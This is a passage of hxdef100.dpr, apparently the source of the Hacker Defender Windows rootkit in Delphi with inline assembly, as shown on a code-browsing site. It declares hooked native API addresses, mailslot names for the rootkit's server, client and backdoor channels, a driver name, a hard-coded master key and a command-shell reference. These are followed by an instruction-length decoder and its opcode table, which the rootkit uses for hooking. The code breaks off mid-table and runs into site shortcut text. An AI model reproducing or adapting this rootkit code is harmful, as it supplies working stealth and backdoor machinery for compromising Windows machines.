📄 hxdef100.dpr
字号:
@NtNotifyChangeDirectoryFileAddr : dd 000000000h
@NtWaitForSingleObjectAddr : dd 000000000h
@NtWaitForMultipleObjectsAddr : dd 000000000h
@NtDelayExecutionAddr : dd 000000000h
@NtQuerySystemTimeAddr : dd 000000000h
{$IFDEF LOGGING}
@NtWriteFileAddr : dd 000000000h
{$ENDIF}
@Data:
@BaseNamedObjectsName : db '\BaseNamedObjects' ,000h
@Consts :
@cServerMailslotName : db '\\.\mailslot\hxdef-rk100sABCDEFGH',000h
@cClientMailslotName : db '\\.\mailslot\hxdef-rkc000' ,000h
@cBackdoorMailslotName : db '\\.\mailslot\hxdef-rkb000' ,000h
@cMailslotsHiddenName : db '\Device\Mailslot\hxdef*' ,000h
@cDeviceTCP : db '\Device\Tcp' ,000h
@cDeviceUDP : db '\Device\Udp' ,000h
@cDriverDeviceName : db '\',000h, '?',000h, '?',000h, '\',000h
db 'H',000h, 'x',000h, 'D',000h, 'e',000h
db 'f',000h, 'D',000h, 'r',000h, 'i',000h
db 'v',000h, 'e',000h, 'r',000h,000h,000h
@cMasterKey : db 001h,09Ah,08Ch,066h,0AFh,0C0h,04Ah,011h
db 09Eh,03Fh,040h,088h,012h,02Ch,03Ah,04Ah
db 084h,065h,038h,0B0h,0B4h,008h,00Bh,0AFh
db 0DBh,0CEh,002h,094h,034h,05Fh,022h,000h
@cShellExecutable : db 'C',000h, 'O',000h, 'M',000h, 'S',000h
db 'P',000h, 'E',000h, 'C',000h,000h,000h
@IntercomBuffer : db 001h,002h,003h,004h,005h,006h,007h,008h
db 009h,00Ah,00Bh,00Ch,00Dh
@cSWSA : db 000h,000h,000h,000h,000h,001h
@Locals :
{infector vars}
@LGlobalCheck : db 00h
@LCriticalSectionFlag : db 00h
@LUnhookInProgress : db 00h
@LReserved1 : db 00h
//these two must be together and form 8 byte buffer
@LHookRunning : dd 000000000h
@LNotifyTable : dd 000000000h
@GetInstructionLen:
mov ecx,[esp+004h] //ECX = opcode ptr
xor edx,edx //flags
xor eax,eax
@GetInstructionLen_prefix:
and dl,not C_PREFIX
mov al,[ecx]
inc ecx
push ebx
call @GetInstructionLen_nul_addr1
@GetInstructionLen_nul_addr1:
pop ebx
add ebx,0104h
or edx,[ebx+eax*004h]
pop ebx
test dl, C_PREFIX
jnz @GetInstructionLen_prefix
cmp al,0F6h
je @GetInstructionLen_test
cmp al,0F7h
je @GetInstructionLen_test
cmp al,0CDh
je @GetInstructionLen_int
cmp al,0Fh
je @GetInstructionLen_0F
@GetInstructionLen_cont:
test dh,C_DATAW0 shr 8
jnz @GetInstructionLen_dataw0
@GetInstructionLen_dataw0done:
test dh,C_MODRM shr 8
jnz @GetInstructionLen_modrm
@GetInstructionLen_exitmodrm:
test dl,C_MEM67
jnz @GetInstructionLen_mem67
@GetInstructionLen_mem67done:
test dh,C_DATA66 shr 8
jnz @GetInstructionLen_data66
@GetInstructionLen_data66done:
mov eax,ecx
sub eax,[esp+4]
and edx,C_MEM1+C_MEM2+C_MEM4 + C_DATA1+C_DATA2+C_DATA4
add al,dl
add al,dh
@GetInstructionLen_exit:
ret 004h
@GetInstructionLen_test:
or dh,C_MODRM shr 8
test byte ptr [ecx],00111000b // F6/F7 -- test
jnz @GetInstructionLen_cont
or dh,C_DATAW0 shr 8
jmp @GetInstructionLen_cont
@GetInstructionLen_int:
or dh,C_DATA1 shr 8
cmp byte ptr [ecx],20h
jne @GetInstructionLen_cont
or dh,C_DATA4 shr 8
jmp @GetInstructionLen_cont
@GetInstructionLen_0F:
mov al,[ecx]
inc ecx
push ebx
call @GetInstructionLen_nul_addr2
@GetInstructionLen_nul_addr2:
pop ebx
add ebx,049Ch
or edx,[ebx+eax*004h]
pop ebx
cmp edx,-1
jne @GetInstructionLen_cont
@GetInstructionLen_error:
mov eax,edx
jmp @GetInstructionLen_exit
@GetInstructionLen_dataw0:
xor dh,C_DATA66 shr 8
test al,00000001b
jnz @GetInstructionLen_dataw0done
xor dh,(C_DATA66+C_DATA1) shr 8
jmp @GetInstructionLen_dataw0done
@GetInstructionLen_mem67:
xor dl,C_MEM2
test dl,C_67
jnz @GetInstructionLen_mem67done
xor dl,C_MEM4+C_MEM2
jmp @GetInstructionLen_mem67done
@GetInstructionLen_data66:
xor dh,C_DATA2 shr 8
test dh,C_66 shr 8
jnz @GetInstructionLen_data66done
xor dh,(C_DATA4+C_DATA2) shr 8
jmp @GetInstructionLen_data66done
@GetInstructionLen_modrm:
mov al,[ecx]
inc ecx
mov ah,al // ah=mod, al=rm
and ax,0C007h
cmp ah,0C0h
je @GetInstructionLen_exitmodrm
test dl,C_67
jnz @GetInstructionLen_modrm16
@GetInstructionLen_modrm32:
cmp al,04h
jne @GetInstructionLen_a
mov al,[ecx] // sib
inc ecx
and al,07h
@GetInstructionLen_a:
cmp ah,40h
je @GetInstructionLen_mem1
cmp ah,80h
je @GetInstructionLen_mem4
cmp ax,0005h
jne @GetInstructionLen_exitmodrm
@GetInstructionLen_mem4:
or dl,C_MEM4
jmp @GetInstructionLen_exitmodrm
@GetInstructionLen_mem1:
or dl,C_MEM1
jmp @GetInstructionLen_exitmodrm
@GetInstructionLen_modrm16:
cmp ax,0006h
je @GetInstructionLen_mem2
cmp ah,40h
je @GetInstructionLen_mem1
cmp ah,80h
jne @GetInstructionLen_exitmodrm
@GetInstructionLen_mem2:
or dl,C_MEM2
jmp @GetInstructionLen_exitmodrm
// .data
//0F -- analyzed in code, no flags (i.e.flags must be 0)
//F6,F7 -- --//-- (ttt=000 -- 3 bytes, otherwise 2 bytes)
//CD -- --//-- (6 bytes if CD 20, 2 bytes otherwise)
@GetInstructionLen_table_1: //label dword // normal instructions
dd C_MODRM //00
dd C_MODRM //01
dd C_MODRM //02
dd C_MODRM //03
dd C_DATAW0 //04
dd C_DATAW0 //05
dd 0 //06
dd 0 //07
dd C_MODRM //08
dd C_MODRM //09
dd C_MODRM //0A
dd C_MODRM //0B
dd C_DATAW0 //0C
dd C_DATAW0 //0D
dd 0 //0E
dd 0 //0F
dd C_MODRM //10
dd C_MODRM //11
dd C_MODRM //12
dd C_MODRM //13
dd C_DATAW0 //14
dd C_DATAW0 //15
dd 0 //16
dd 0 //17
dd C_MODRM //18
dd C_MODRM //19
dd C_MODRM //1A
dd C_MODRM //1B
dd C_DATAW0 //1C
dd C_DATAW0 //1D
dd 0 //1E
dd 0 //1F
dd C_MODRM //20
dd C_MODRM //21
dd C_MODRM //22
dd C_MODRM //23
dd C_DATAW0 //24
dd C_DATAW0 //25
dd C_PREFIX //26
dd 0 //27
dd C_MODRM //28
dd C_MODRM //29
dd C_MODRM //2A
dd C_MODRM //2B
dd C_DATAW0 //2C
dd C_DATAW0 //2D
dd C_PREFIX //2E
dd 0 //2F
dd C_MODRM //30
dd C_MODRM //31
dd C_MODRM //32
dd C_MODRM //33
dd C_DATAW0 //34
dd C_DATAW0 //35
dd C_PREFIX //36
dd 0 //37
dd C_MODRM //38
dd C_MODRM //39
dd C_MODRM //3A
dd C_MODRM //3B
dd C_DATAW0 //3C
dd C_DATAW0 //3D
dd C_PRE⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -